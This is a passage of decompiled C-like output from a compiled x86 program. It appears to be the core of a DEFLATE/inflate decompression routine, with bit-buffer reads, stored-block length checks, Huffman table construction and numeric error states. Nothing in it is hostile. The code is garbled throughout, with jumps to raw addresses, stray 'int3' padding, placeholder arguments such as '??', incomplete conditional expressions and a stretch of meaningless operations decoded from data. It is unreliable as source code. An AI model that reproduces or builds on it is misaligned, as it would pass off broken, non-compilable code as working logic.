																	 *(_t1058 - 0x1c) = _t652;
																	__eflags = _t868;
																	if(_t868 >= 0) {
																		goto L3;
																	}
																	L235:
																	_t596 = _t652 + 1;
																	__eflags = _t1043 - _t596;
																	if(_t1043 < _t596) {
																		goto L1;
																	} else {
																		L236:
																		_t868 =  *(_t1058 - 0x1c);
																		continue;
																	}
																	goto L295;
																}
																goto L3;
															}
														} else {
															L228:
															_t596 = _t596 >> 9;
															__eflags = _t596;
															if(_t596 == 0) {
																L1:
																if(_t841 >=  *(_t1058 - 0x20)) {
																	L264:
																	 *_t1022 = 0x1a;
																	goto L285;
																} else {
																	goto L2;
																}
															} else {
																L229:
																__eflags = _t1043 - _t596;
																if(_t1043 >= _t596) {
																	goto L3;
																} else {
																	L230:
																	goto L1;
																}
															}
														}
														goto L295;
														L2:
														_t868 = _t1043;
														_t644 = ( *_t841 & 0x000000ff) << _t868;
														_t841 = _t841 + 1;
														_t962 = _t962 | _t644;
														 *(_t1058 - 0x18) = _t841;
														_t1043 = _t1043 + 8;
														 *(_t1058 - 4) = _t962;
													} while (_t1043 < 0xf);
												}
												goto L3;
											}
										} else {
											L220:
											__eflags = _t1043 - _t868;
											if(_t1043 >= _t868) {
												L223:
												L224:
												_t1043 = _t1043 - _t868;
												_t680 = (_t596 << _t868) - 0x00000001 & _t962;
												_t962 = _t962 >> _t868;
												_t456 = _t1058 - 8;
												 *_t456 =  *(_t1058 - 8) + _t680;
												__eflags =  *_t456;
												 *(_t1058 - 4) = _t962;
												goto L225;
											} else {
												while(1) {
													L221:
													__eflags = _t841 -  *(_t1058 - 0x20);
													if(_t841 >=  *(_t1058 - 0x20)) {
														break;
													}
													L222:
													_t596 = ( *_t841 & 0x000000ff) << _t1043;
													_t841 = _t841 + 1;
													_t868 =  *(_t1058 - 0x38);
													_t962 = _t962 | _t596;
													_t1043 = _t1043 + 8;
													 *(_t1058 - 0x18) = _t841;
													 *(_t1058 - 4) = _t962;
													__eflags = _t1043 - _t868;
													if(_t1043 < _t868) {
														continue;
													} else {
														goto L223;
													}
													goto L295;
												}
												L262:
												 *_t1022 = 0x19;
												goto L285;
											}
										}
									} else {
										while(1) {
											L85:
											__eflags =  *(_t1022 + 0x14) & 0x00000001;
											if(( *(_t1022 + 0x14) & 0x00000001) != 0) {
												break;
											}
											L86:
											__eflags = _t1043 - 3;
											if(_t1043 >= 3) {
												L89:
												_t1043 = _t1043 - 3;
												_t693 = _t962 & 0x00000007;
												_t991 = _t962 >> 3;
												 *(_t1022 + 0x14) = _t693;
												_t596 = _t693 >> 1;
												__eflags = _t596;
												 *(_t1058 - 4) = _t991;
												 *(_t1058 - 0x1c) = _t1043;
												 *(_t1022 + 0x18) = _t596;
												if(_t596 != 0) {
													L124:
													__eflags = _t596 - 3;
													if(_t596 == 3) {
														L266:
														 *(_t1058 - 0xc) = 0xffffffff;
														 *_t1022 = 0xa;
														goto L292;
													} else {
														L125:
														__eflags = _t596 - 1;
														if(_t596 != 1) {
															L128:
															_t893 = 0;
															__eflags = 0;
															while(1) {
																L129:
																 *(_t1058 - 8) = _t893;
																__eflags = _t893 - 3;
																if(_t893 >= 3) {
																	break;
																}
																L130:
																_t596 =  *((char*)(_t893 + 0x2b1004));
																 *(_t1058 - 0x1c) = _t596;
																__eflags = _t1043 - _t596;
																if(_t1043 >= _t596) {
																	L133:
																	_t1017 = _t1022 + _t893 * 4;
																	_t1036 =  *(_t1058 - 4);
																	 *(_t1017 + 0x2c) = (0x00000001 <<  *(_t1058 - 0x1c)) - 0x00000001 & _t1036;
																	_t804 =  *(_t1058 - 8);
																	_t931 =  *((char*)(_t804 + 0x2b1004));
																	_t1037 = _t1036 >> _t931;
																	_t1043 = _t1043 - _t931;
																	_t932 = _t804;
																	 *(_t1058 - 4) = _t1037;
																	 *(_t1058 - 0x1c) = _t1043;
																	_t596 =  *(0x2b1a38 + _t932 * 4);
																	 *(_t1017 + 0x2c) =  *(_t1017 + 0x2c) +  *(0x2b1a38 + _t932 * 4);
																	_t991 = _t1037;
																	_t1022 =  *(_t1058 - 0x14);
																	_t893 = _t932 + 1;
																	continue;
																} else {
																	while(1) {
																		L131:
																		__eflags = _t841 -  *(_t1058 - 0x20);
																		if(_t841 >=  *(_t1058 - 0x20)) {
																			break;
																		}
																		L132:
																		_t806 = ( *_t841 & 0x000000ff) << _t1043;
																		_t841 = _t841 + 1;
																		_t893 =  *(_t1058 - 8);
																		_t991 = _t991 | _t806;
																		_t1043 = _t1043 + 8;
																		 *(_t1058 - 0x18) = _t841;
																		 *(_t1058 - 4) = _t991;
																		_t596 =  *((char*)(_t893 + 0x2b1004));
																		 *(_t1058 - 0x1c) = _t596;
																		__eflags = _t1043 - _t596;
																		if(_t1043 < _t596) {
																			continue;
																		} else {
																			goto L133;
																		}
																		goto L295;
																	}
																	L248:
																	 *_t1022 = 0xb;
																	goto L285;
																}
																goto L295;
															}
															L134:
															goto L0;
														} else {
															L126:
															goto 0x5a13af;
															asm("int3");
															asm("int3");
															 *((intOrPtr*)(_t596 + 0x2c)) = 0x120;
															L127:
															_t808 = _t596 + 1 - 0x20;
															 *_t808 =  *_t808 + _t808;
															_t841 = _t841 + _t808;
															_t809 = _t808 + 1;
															 *_t809 =  *_t809 ^ _t809;
															 *_t809 = _t809 +  *_t809;
															 *0xde0 =  *0xde0 + _t809;
															memset(_t809, ??, ??);
															asm("movdqa xmm0, [0x2b1ae0]");
															_t1061 = _t1061 + 0xc;
															asm("movdqu [edi+0x40], xmm0");
															asm("movdqu [edi+0x50], xmm0");
															asm("movdqu [edi+0x60], xmm0");
															asm("movdqu [edi+0x70], xmm0");
															asm("movdqu [edi+0x80], xmm0");
															asm("movdqu [edi+0x90], xmm0");
															asm("movdqu [edi+0xa0], xmm0");
															asm("movdqu [edi+0xb0], xmm0");
															asm("movdqu [edi+0xc0], xmm0");
															_t1038 = _t1022 + 0xd0;
															asm("movdqa xmm0, [0x2b1af0]");
															asm("movdqu [edi], xmm0");
															asm("movdqu [edi+0x10], xmm0");
															asm("movdqu [edi+0x20], xmm0");
															asm("movdqu [edi+0x30], xmm0");
															asm("movdqu [edi+0x40], xmm0");
															asm("movdqu [edi+0x50], xmm0");
															asm("movdqu [edi+0x60], xmm0");
															asm("movdqa xmm0, [0x2b1ad0]");
															asm("movdqu [edi+0x70], xmm0");
															asm("movq [edi+0x80], xmm0");
															 *((intOrPtr*)(_t1038 + 0x88)) = 0x8080808;
															 *((intOrPtr*)(_t1038 + 0x8c)) = 0x8080808;
															_t1022 =  *(_t1058 - 0x14);
															goto L141;
														}
													}
												} else {
													L90:
													_t596 = _t1043 & 0x00000007;
													__eflags = _t1043 - _t596;
													if(_t1043 >= _t596) {
														L93:
														_t935 = _t1043 & 0x00000007;
														_t962 = _t991 >> _t935;
														_t1043 = _t1043 - _t935;
														 *(_t1058 - 4) = _t962;
														_t936 = 0;
														__eflags = 0;
														while(1) {
															L94:
															 *(_t1058 - 8) = _t936;
															__eflags = _t936 - 4;
															if(_t936 >= 4) {
																break;
															}
															L95:
															__eflags = _t1043;
															if(_t1043 == 0) {
																L101:
																__eflags = _t841 -  *(_t1058 - 0x20);
																if(_t841 >=  *(_t1058 - 0x20)) {
																	L244:
																	 *_t1022 = 7;
																	goto L285;
																} else {
																	L102:
																	_t596 =  *_t841;
																	_t841 = _t841 + 1;
																	(_t1022 + 0x2920)[_t936] = _t596;
																	_t936 = _t936 + 1;
																	 *(_t1058 - 0x18) = _t841;
																	continue;
																}
															} else {
																L96:
																__eflags = _t1043 - 8;
																if(_t1043 >= 8) {
																	L100:
																	(_t1022 + 0x2920)[_t936] = _t962;
																	_t1043 = _t1043 - 8;
																	_t962 = _t962 >> 8;
																	_t936 = _t936 + 1;
																	 *(_t1058 - 4) = _t962;
																	continue;
																} else {
																	while(1) {
																		L97:
																		__eflags = _t841 -  *(_t1058 - 0x20);
																		if(_t841 >=  *(_t1058 - 0x20)) {
																			break;
																		}
																		L98:
																		_t596 = ( *_t841 & 0x000000ff) << _t1043;
																		_t841 = _t841 + 1;
																		_t962 = _t962 | _t596;
																		 *(_t1058 - 0x18) = _t841;
																		_t1043 = _t1043 + 8;
																		 *(_t1058 - 4) = _t962;
																		__eflags = _t1043 - 8;
																		if(_t1043 < 8) {
																			continue;
																		} else {
																			L99:
																			_t936 =  *(_t1058 - 8);
																			goto L100;
																		}
																		goto L295;
																	}
																	L243:
																	 *_t1022 = 6;
																	goto L285;
																}
															}
															goto L295;
														}
														L103:
														_t596 =  *(_t1022 + 0x2922) & 0x000000ff;
														 *(_t1058 - 8) = ( *(_t1022 + 0x2921) & 0x000000ff) << 0x00000008 |  *(_t1022 + 0x2920) & 0x000000ff;
														__eflags =  *(_t1058 - 8) - ((( *(_t1022 + 0x2923) & 0x000000ff) << 0x00000008 | _t596) ^ 0x0000ffff);
														if( *(_t1058 - 8) != ((( *(_t1022 + 0x2923) & 0x000000ff) << 0x00000008 | _t596) ^ 0x0000ffff)) {
															L265:
															 *(_t1058 - 0xc) = 0xffffffff;
															 *_t1022 = 0x27;
															goto L292;
														} else {
															L104:
															_t944 =  *(_t1058 - 8);
															while(1) {
																L105:
																__eflags = _t944;
																if(_t944 == 0) {
																	goto L85;
																}
																L106:
																__eflags = _t1043;
																if(_t1043 == 0) {
																	L113:
																	_t596 =  *(_t1058 - 0x10);
																	while(1) {
																		L114:
																		__eflags = _t944;
																		if(_t944 == 0) {
																			break;
																		}
																		L116:
																		_t1018 =  *((intOrPtr*)(_t1058 - 0x40));
																		__eflags = _t596 - _t1018;
																		if(_t596 < _t1018) {
																			L118:
																			_t596 =  *(_t1058 - 0x20);
																			__eflags = _t841 - _t596;
																			if(_t841 >= _t596) {
																				L247:
																				_t1022 =  *(_t1058 - 0x14);
																				 *_t1022 = 0x26;
																				goto L285;
																			} else {
																				L119:
																				_t962 = _t1018 -  *(_t1058 - 0x10);
																				_t1040 = _t596 - _t841;
																				__eflags = _t962 - _t1040;
																				_t814 =  <  ? _t962 : _t1040;
																				__eflags = ( <  ? _t962 : _t1040) - _t944;
																				if(( <  ? _t962 : _t1040) >= _t944) {
																					_t1022 = _t944;
																				} else {
																					__eflags = _t962 - _t1040;
																					_t1022 =  <  ? _t962 : _t1040;
																				}
																				L122:
																				L123:
																				memcpy();
																				_t841 = _t841 + _t1022;
																				_t596 =  *(_t1058 - 0x10) + _t1022;
																				_t1061 = _t1061 + 0xc;
																				 *(_t1058 - 0x18) = _t841;
																				_t944 =  *(_t1058 - 8) - _t1022;
																				 *(_t1058 - 0x10) = _t596;
																				 *(_t1058 - 8) = _t944;
																				continue;
																			}
																		} else {
																			L117:
																			_t1022 =  *(_t1058 - 0x14);
																			 *(_t1058 - 0xc) = 2;
																			 *_t1022 = 9;
																			goto L292;
																		}
																		goto L295;
																	}
																	L115:
																	goto 0x5a1388;
																	asm("int3");
																	goto L85;
																} else {
																	L107:
																	__eflags = _t1043 - 8;
																	if(_t1043 >= 8) {
																		L110:
																		_t596 = _t962 & 0x000000ff;
																		_t962 = _t962 >> 8;
																		_t1043 = _t1043 - 8;
																		 *(_t1058 - 0x28) = _t596;
																		 *(_t1058 - 4) = _t962;
																		L111:
																		__eflags =  *(_t1058 - 0x10) -  *((intOrPtr*)(_t1058 - 0x40));
																		_t1022 =  *(_t1058 - 0x14);
																		if( *(_t1058 - 0x10) >=  *((intOrPtr*)(_t1058 - 0x40))) {
																			L246:
																			 *(_t1058 - 0xc) = 2;
																			 *_t1022 = 0x34;
																			goto L292;
																		} else {
																			L112:
																			 *(_t1058 - 0x10) =  *(_t1058 - 0x10) + 1;
																			 *( *(_t1058 - 0x10)) = _t596;
																			_t944 =  *(_t1058 - 8) - 1;
																			 *(_t1058 - 8) = _t944;
																			continue;
																		}
																	} else {
																		while(1) {
																			L108:
																			__eflags = _t841 -  *(_t1058 - 0x20);
																			if(_t841 >=  *(_t1058 - 0x20)) {
																				break;
																			}
																			L109:
																			_t596 = ( *_t841 & 0x000000ff) << _t1043;
																			_t841 = _t841 + 1;
																			_t962 = _t962 | _t596;
																			 *(_t1058 - 0x18) = _t841;
																			_t1043 = _t1043 + 8;
																			 *(_t1058 - 4) = _t962;
																			__eflags = _t1043 - 8;
																			if(_t1043 < 8) {
																				continue;
																			} else {
																				goto L110;
																			}
																			goto L295;
																		}
																		L245:
																		 *_t1022 = 0x33;
																		goto L285;
																	}
																}
																goto L295;
															}
															continue;
														}
													} else {
														while(1) {
															L91:
															__eflags = _t841 -  *(_t1058 - 0x20);
															if(_t841 >=  *(_t1058 - 0x20)) {
																break;
															}
															L92:
															_t820 = ( *_t841 & 0x000000ff) << _t1043;
															_t1043 = _t1043 + 8;
															_t991 = _t991 | _t820;
															_t841 = _t841 + 1;
															 *(_t1058 - 0x18) = _t841;
															_t596 = _t1043 & 0x00000007;
															 *(_t1058 - 4) = _t991;
															__eflags = _t1043 - _t596;
															if(_t1043 < _t596) {
																continue;
															} else {
																goto L93;
															}
															goto L295;
														}
														L242:
														 *_t1022 = 5;
														goto L285;
													}
												}
											} else {
												while(1) {
													L87:
													__eflags = _t841 -  *(_t1058 - 0x20);
													if(_t841 >=  *(_t1058 - 0x20)) {
														break;
													}
													L88:
													_t596 = ( *_t841 & 0x000000ff) << _t1043;
													_t841 = _t841 + 1;
													_t962 = _t962 | _t596;
													 *(_t1058 - 0x18) = _t841;
													_t1043 = _t1043 + 8;
													 *(_t1058 - 4) = _t962;
													__eflags = _t1043 - 3;
													if(_t1043 < 3) {
														continue;
													} else {
														goto L89;
													}
													goto L295;
												}
												L241:
												 *_t1022 = 3;
												goto L285;
											}
											goto L295;
										}
										L252:
										_t596 = _t1043 & 0x00000007;
										__eflags = _t1043 - _t596;
										if(_t1043 >= _t596) {
											L256:
											_t683 =  *(_t1058 - 0x3c);
											_t886 = _t1043 & 0x00000007;
											_t986 = _t962 >> _t886;
											_t1043 = _t1043 - _t886;
											 *(_t1058 - 4) = _t986;
											__eflags = _t841 - _t683;
											if(_t841 > _t683) {
												while(1) {
													L257:
													__eflags = _t1043 - 8;
													if(_t1043 < 8) {
														goto L259;
													}
													L258:
													_t841 = _t841 - 1;
													_t1043 = _t1043 - 8;
													__eflags = _t841 - _t683;
													if(_t841 > _t683) {
														continue;
													}
													goto L259;
												}
											}
											L259:
											L260:
											_t596 = _t1043;
											asm("bts edx, eax");
											__eflags = _t596 - 0x20;
											_t888 =  >=  ? _t986 : 0;
											_t987 = _t986 ^ _t888;
											__eflags = _t596 - 0x40;
											_t889 =  >=  ? _t987 : _t888;
											 *(_t1058 - 4) =  *(_t1058 - 4) & _t987 - 0x00000001;
											__eflags =  *(_t1058 + 0x18) & 0x00000001;
											if(( *(_t1058 + 0x18) & 0x00000001) == 0) {
												L290:
												_t684 = 0;
												__eflags = 0;
												 *_t1022 = 0x22;
												L291:
												 *(_t1058 - 0xc) = _t684;
												goto L292;
											} else {
												L261:
												_t890 = 0;
												while(1) {
													L277:
													 *(_t1058 - 8) = _t890;
													__eflags = _t890 - 4;
													if(_t890 >= 4) {
														goto L290;
													}
													L278:
													__eflags = _t1043;
													if(_t1043 != 0) {
														L281:
														_t989 =  *(_t1058 - 4);
														__eflags = _t1043 - 8;
														if(_t1043 >= 8) {
															L275:
															_t685 = _t989 & 0x000000ff;
															_t1043 = _t1043 - 8;
															__eflags = _t1043;
															 *(_t1058 - 4) = _t989 >> 8;
															goto L276;
														} else {
															L282:
															while(1) {
																L272:
																__eflags = _t841 -  *(_t1058 - 0x20);
																if(_t841 >=  *(_t1058 - 0x20)) {
																	break;
																}
																L273:
																_t596 = ( *_t841 & 0x000000ff) << _t1043;
																_t1043 = _t1043 + 8;
																_t989 = _t989 | _t596;
																_t841 = _t841 + 1;
																 *(_t1058 - 4) = _t989;
																__eflags = _t1043 - 8;
																if(_t1043 < 8) {
																	continue;
																} else {
																	L274:
																	_t890 =  *(_t1058 - 8);
																	goto L275;
																}
																goto L295;
															}
															L284:
															 *_t1022 = 0x29;
															goto L285;
														}
													} else {
														L279:
														__eflags = _t841 -  *(_t1058 - 0x20);
														if(_t841 >=  *(_t1058 - 0x20)) {
															L283:
															 *_t1022 = 0x2a;
															goto L285;
														} else {
															L280:
															_t685 =  *_t841 & 0x000000ff;
															_t841 = _t841 + 1;
															L276:
															 *(_t1058 - 0x24) = _t685;
															_t596 =  *(_t1022 + 0x10) << 0x00000008 |  *(_t1058 - 0x24);
															_t890 = _t890 + 1;
															__eflags = _t890;
															 *(_t1022 + 0x10) = _t596;
															continue;
														}
													}
													goto L295;
												}
												goto L290;
											}
										} else {
											L253:
											while(1) {
												L254:
												__eflags = _t841 -  *(_t1058 - 0x20);
												if(_t841 >=  *(_t1058 - 0x20)) {
													break;
												}
												L255:
												_t690 = ( *_t841 & 0x000000ff) << _t1043;
												_t1043 = _t1043 + 8;
												_t962 = _t962 | _t690;
												_t841 = _t841 + 1;
												 *(_t1058 - 4) = _t962;
												_t596 = _t1043 & 0x00000007;
												__eflags = _t1043 - _t596;
												if(_t1043 < _t596) {
													continue;
												} else {
													goto L256;
												}
												goto L295;
											}
											L271:
											 *_t1022 = 0x20;
											goto L285;
										}
									}
								} else {
									L49:
									__eflags = _t1043 - 0xf;
									if(_t1043 < 0xf) {
										_t999 =  *(_t841 + 1) & 0x000000ff;
										_t880 = _t1043;
										_t721 =  *_t841 & 0x000000ff;
										_t841 = _t841 + 2;
										_t1022 =  *(_t1058 - 0x14);
										 *(_t1058 - 0x18) = _t841;
										 *(_t1058 - 4) =  *(_t1058 - 4) | (_t999 << 0x00000008 | _t721) << _t880;
										_t1043 = _t1043 + 0x10;
										__eflags = _t1043;
										_t962 =  *(_t1058 - 4);
									}
									_t714 =  *((short*)(_t1022 + 0x160 + (_t962 & 0x000003ff) * 2));
									 *(_t1058 - 0x1c) = _t714;
									__eflags = _t714;
									if(_t714 < 0) {
										L53:
										goto 0x5a1349;
										asm("int3");
										asm("int3");
										asm("int3");
										do {
											L54:
											_t716 = _t962 >> _t880;
											_t880 = _t880 + 1;
											_t841 =  *((short*)(_t1022 + 0x960 + ((_t716 & 0x00000001) +  !_t841) * 2));
											__eflags = _t841;
										} while (_t841 < 0);
										 *(_t1058 - 0x1c) = _t841;
										_t841 =  *(_t1058 - 0x18);
									} else {
										L52:
										_t880 = _t714 >> 9;
									}
									L56:
									_t596 =  *(_t1058 - 8);
									_t1043 = _t1043 - _t880;
									_t962 = _t962 >> _t880;
									 *(_t1058 - 4) = _t962;
									 *( *(_t1058 - 0x10)) = _t596;
									_t880 =  *(_t1058 - 0x1c);
									__eflags = _t880 & 0x00000100;
									if((_t880 & 0x00000100) != 0) {
										L83:
										_t170 = _t1058 - 0x10;
										 *_t170 =  *(_t1058 - 0x10) + 1;
										__eflags =  *_t170;
										goto L84;
									} else {
										L57:
										_t719 =  *(_t1058 - 0x10);
										 *(_t719 + 1) = _t880;
										 *(_t1058 - 0x10) = _t719 + 2;
										continue;
										do {
											do {
												while(1) {
													L39:
													_t879 =  *(_t1058 - 0x20) - _t841;
													__eflags = _t879 - 4;
													if(_t879 < 4) {
														goto L58;
													}
													goto L40;
												}
												L26:
												__eflags = _t877;
											} while (_t877 == 0);
											goto 0x5a12e3;
											asm("int3");
											_t824 =  *_t830;
											 *_t1022 = _t824;
											_t1022 =  *(_t1058 - 0x14);
											__eflags = _t877 - 1;
											if(_t877 > 1) {
												L29:
												L36:
												goto 0x5a131f;
												asm("int3");
												 *(_t982 + 1) =  *((intOrPtr*)(_t824 + 1));
												_t982 =  *(_t1058 - 4);
											}
											L38:
											_t85 = _t1058 - 0x10;
											 *_t85 = _t877 +  *(_t1058 - 0x10);
											__eflags =  *_t85;
											while(1) {
												L39:
												_t879 =  *(_t1058 - 0x20) - _t841;
												__eflags = _t879 - 4;
												if(_t879 < 4) {
													goto L58;
												}
												goto L40;
											}
											L33:
											 *(_t1058 - 0x10) = _t1022;
											_t1022 =  *(_t1058 - 0x14);
											 *(_t1058 - 0xc) = _t982;
											_t982 =  *(_t1058 - 4);
											 *(_t1058 - 8) = _t877;
											__eflags = _t877;
										} while (_t877 <= 0);
										goto 0x5a130b;
										asm("int3");
										_t824 =  *_t666;
										 *_t1022 = _t824;
										_t1022 =  *(_t1058 - 0x14);
										__eflags = _t877 - 1;
										if(_t877 > 1) {
											goto L36;
										}
										goto L38;
									}
								}
							}
							goto L295;
							L58:
							__eflags = _t1043 - 0xf;
							if(_t1043 >= 0xf) {
								L75:
								_t669 =  *((short*)(_t1022 + 0x160 + (_t982 & 0x000003ff) * 2));
								 *(_t1058 - 8) = _t669;
								__eflags = _t669;
								if(_t669 < 0) {
									L77:
									goto 0x5a1372;
									asm("int3");
									asm("int3");
									asm("int3");
									do {
										L78:
										_t671 = _t982 >> _t879;
										_t879 = _t879 + 1;
										_t596 = (_t671 & 0x00000001) +  !_t841;
										_t841 =  *((short*)(_t1022 + 0x960 + _t596 * 2));
										__eflags = _t841;
									} while (_t841 < 0);
									 *(_t1058 - 8) = _t841;
									_t841 =  *(_t1058 - 0x18);
								} else {
									L76:
									_t879 = _t669 >> 9;
									_t596 = _t669 & 0x000001ff;
									 *(_t1058 - 8) = _t596;
								}
								L80:
								_t962 = _t982 >> _t879;
								_t1043 = _t1043 - _t879;
								_t880 =  *(_t1058 - 8);
								 *(_t1058 - 4) = _t962;
								__eflags = _t880 - 0x100;
								if(_t880 >= 0x100) {
									goto L84;
								} else {
									L81:
									_t822 =  *(_t1058 - 0x10);
									__eflags = _t822 -  *((intOrPtr*)(_t1058 - 0x40));
									if(_t822 >=  *((intOrPtr*)(_t1058 - 0x40))) {
										L240:
										 *(_t1058 - 0xc) = 2;
										 *_t1022 = 0x18;
										goto L292;
									} else {
										L82:
										 *_t822 = _t880;
										 *(_t1058 - 0x10) = _t822 + 1;
										continue;
									}
								}
							} else {
								L59:
								__eflags = _t879 - 2;
								if(_t879 >= 2) {
									L73:
									_t992 =  *(_t841 + 1) & 0x000000ff;
									_t695 =  *_t841 & 0x000000ff;
									_t841 = _t841 + 2;
									_t879 = _t1043;
									 *(_t1058 - 0x18) = _t841;
									 *(_t1058 - 4) =  *(_t1058 - 4) | _t992 << _t1043 + 0x00000008 | _t695 << _t879;
									_t1043 = _t1043 + 0x10;
									__eflags = _t1043;
									_t982 =  *(_t1058 - 4);
									goto L74;
								} else {
									do {
										L60:
										_t596 = _t982 & 0x000003ff;
										_t1025 =  *((short*)(_t1022 + 0x160 + _t596 * 2));
										__eflags = _t1025;
										if(_t1025 < 0) {
											L64:
											__eflags = _t1043 - 0xa;
											if(_t1043 <= 0xa) {
												goto L69;
											} else {
												L65:
												 *(_t1058 - 0x1c) = _t879;
												while(1) {
													L67:
													_t1025 =  *((short*)( *(_t1058 - 0x14) + 0x960 + ((_t982 >> _t879 & 0x00000001) +  !_t1025) * 2));
													_t879 =  *(_t1058 - 0x1c) + 1;
													 *(_t1058 - 0x1c) = _t879;
													__eflags = _t1025;
													if(_t1025 >= 0) {
														goto L74;
													}
													L68:
													_t596 = _t879 + 1;
													__eflags = _t1043 - _t596;
													if(_t1043 >= _t596) {
														continue;
													} else {
														goto L69;
													}
													goto L295;
												}
												goto L74;
											}
										} else {
											L61:
											_t1027 = _t1025 >> 9;
											__eflags = _t1027;
											if(_t1027 == 0) {
												L69:
												_t1022 =  *(_t1058 - 0x14);
												L70:
												__eflags = _t841 -  *(_t1058 - 0x20);
												if(_t841 >=  *(_t1058 - 0x20)) {
													L239:
													 *_t1022 = 0x17;
													goto L285;
												} else {
													goto L71;
												}
											} else {
												L62:
												__eflags = _t1043 - _t1027;
												if(_t1043 >= _t1027) {
													L74:
													_t1022 =  *(_t1058 - 0x14);
													goto L75;
												} else {
													L63:
													goto L69;
												}
											}
										}
										goto L295;
										L71:
										_t879 = _t1043;
										_t699 = ( *_t841 & 0x000000ff) << _t879;
										_t841 = _t841 + 1;
										_t982 = _t982 | _t699;
										 *(_t1058 - 0x18) = _t841;
										_t1043 = _t1043 + 8;
										 *(_t1058 - 4) = _t982;
										__eflags = _t1043 - 0xf;
									} while (_t1043 < 0xf);
									goto L75;
								}
							}
							goto L295;
						}
					}
					L142:
					 *(_t1058 - 0xc) = 0x40 + _t694 * 0xda0 + _t1022;
					memset(_t1058 - 0xd0, 0, 0x40);
					memset( *(_t1058 - 0xc) + 0x120, 0, 0x800);
					memset( *(_t1058 - 0xc) + 0x920, 0, 0x480);
					_t894 = 0;
					_t1061 = _t1061 + 0x24;
					_t1005 = _t1022 + ( *(_t1022 + 0x18) + 0xb) * 4;
					 *(_t1058 - 0x44) = _t1005;
					__eflags =  *_t1005;
					if( *_t1005 > 0) {
						L143:
						_t1022 =  *(_t1058 - 0xc);
						do {
							L144:
							_t797 =  *(_t894 + _t1022) & 0x000000ff;
							_t894 = _t894 + 1;
							 *((intOrPtr*)(_t1058 + _t797 * 4 - 0xd0)) =  *((intOrPtr*)(_t1058 + _t797 * 4 - 0xd0)) + 1;
							__eflags = _t894 -  *_t1005;
						} while (_t894 <  *_t1005);
					}
					L145:
					goto 0x5a13d7;
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					L146:
					 *(_t1058 - 0x8c) = _t894;
					 *(_t1058 - 0x90) = _t894;
					 *(_t1058 - 0x2c) = _t894;
					 *(_t1058 - 0x30) = _t894;
					do {
						L147:
						_t734 =  *((intOrPtr*)(_t1058 + _t1005 - 0xd4));
						_t896 = _t894 + _t734 + _t894 + _t734;
						_t1022 = _t1022 + _t734;
						_t735 =  *((intOrPtr*)(_t1058 + _t1005 - 0xd0));
						 *(_t1058 - 0x30) =  *(_t1058 - 0x30) + _t735;
						 *((intOrPtr*)(_t1058 + _t1005 - 0x90)) = _t896;
						_t736 =  *((intOrPtr*)(_t1058 + _t1005 - 0xcc));
						_t898 = _t896 + _t735 + _t896 + _t735;
						 *(_t1058 - 0x2c) =  *(_t1058 - 0x2c) + _t736;
						 *((intOrPtr*)(_t1058 + _t1005 - 0x8c)) = _t898;
						_t894 = _t898 + _t736 + _t898 + _t736;
						 *(_t1058 + _t1005 - 0x88) = _t894;
						_t1005 = _t1005 + 0xc;
						__eflags = _t1005 - 0x40;
					} while (_t1005 <= 0x40);
					 *(_t1058 - 0x4c) = _t894;
					 *(_t1058 - 0x24) = _t1022;
					_t1022 =  *(_t1058 - 0x14);
					_t901 =  *(_t1058 - 0x24) +  *(_t1058 - 0x2c) +  *(_t1058 - 0x30);
					__eflags =  *(_t1058 - 0x4c) - 0x10000;
					if( *(_t1058 - 0x4c) == 0x10000) {
						L150:
						_t739 =  *(_t1058 - 0x44);
						 *(_t1058 - 0x30) = 0xffffffff;
						 *(_t1058 - 0x4c) = 0;
						__eflags =  *_t739;
						if( *_t739 > 0) {
							L151:
							_t1057 =  *(_t1058 - 0x4c);
							do {
								L152:
								L153:
								_t913 =  *(_t1057 + _t739) & 0x000000ff;
								 *(_t1058 - 0x44) = _t913;
								__eflags = _t913;
								if(_t913 != 0) {
									L154:
									_t776 =  *(_t1058 + _t913 * 4 - 0x90);
									 *(_t1058 - 0x2c) = _t776;
									 *(_t1058 + _t913 * 4 - 0x90) = _t776 + 1;
									 *(_t1058 - 0x24) = _t913;
									__eflags = _t913;
									if(_t913 != 0) {
										L155:
										do {
											L156:
											 *(_t1058 - 0x2c) =  *(_t1058 - 0x2c) >> 1;
											_t796 =  *(_t1058 - 0x24) - 1;
											_t1005 = _t1005 + _t1005 |  *(_t1058 - 0x2c) & 0x00000001;
											 *(_t1058 - 0x24) = _t796;
											__eflags = _t796;
										} while (_t796 != 0);
										_t913 =  *(_t1058 - 0x44);
									}
									L158:
									__eflags = _t913 - 0xa;
									if(_t913 > 0xa) {
										L164:
										_t780 =  *(_t1058 - 0xc) + 0x120 + (_t1005 & 0x000003ff) * 2;
										_t841 =  *(_t1058 - 0x30);
										 *(_t1058 - 0x44) = _t780;
										_t781 =  *_t780;
										 *(_t1058 - 0x2c) = _t781;
										__eflags = _t781;
										if(_t781 == 0) {
											 *( *(_t1058 - 0x44)) = _t841;
											_t781 = _t841;
											_t841 = _t841 - 2;
											__eflags = _t841;
											 *(_t1058 - 0x2c) = _t781;
											 *(_t1058 - 0x30) = _t841;
										}
										L166:
										_t1013 = _t1005 >> 9;
										__eflags = _t913 - 0xb;
										if(_t913 > 0xb) {
											L167:
											_t914 = _t913 + 0xfffffff5;
											__eflags = _t914;
											 *(_t1058 - 0x24) = _t914;
											_t915 =  *(_t1058 - 0x2c);
											do {
												L168:
												_t1013 = _t1013 >> 1;
												_t786 = 0x48f - _t915 - (_t1013 & 0x00000001);
												_t918 =  *( *(_t1058 - 0xc) + 0x91e) & 0x0000ffff;
												__eflags = _t918;
												if(_t918 != 0) {
													_t915 = _t918;
												} else {
													 *( *(_t1058 - 0xc) + _t786 * 2) = _t841;
													_t787 =  *(_t1058 - 0x30);
													_t915 = _t787;
													_t788 = _t787 - 2;
													 *(_t1058 - 0x30) = _t788;
													_t841 = _t788;
												}
												L171:
												_t361 = _t1058 - 0x24;
												 *_t361 =  *(_t1058 - 0x24) - 1;
												__eflags =  *_t361;
											} while ( *_t361 != 0);
											 *(_t1058 - 0x2c) = _t915;
											_t781 = _t915;
										}
										L173:
										_t1005 = (_t1013 >> 0x00000001 & 0x00000001) - _t781;
										__eflags = _t1005;
										 *( *(_t1058 - 0xc) + 0x91e + _t1005 * 2) = _t1057;
									} else {
										L159:
										_t793 = (_t913 << 0x00000009 | _t1057) & 0x0000ffff;
										 *(_t1058 - 0x44) = _t793;
										__eflags = _t1005 - 0x400;
										if(_t1005 < 0x400) {
											L160:
											goto 0x5a1401;
											asm("int3");
											asm("int3");
											asm("int3");
											L161:
											_t794 = _t793 << _t913;
											 *(_t1058 - 0x4c) = _t794 + _t794;
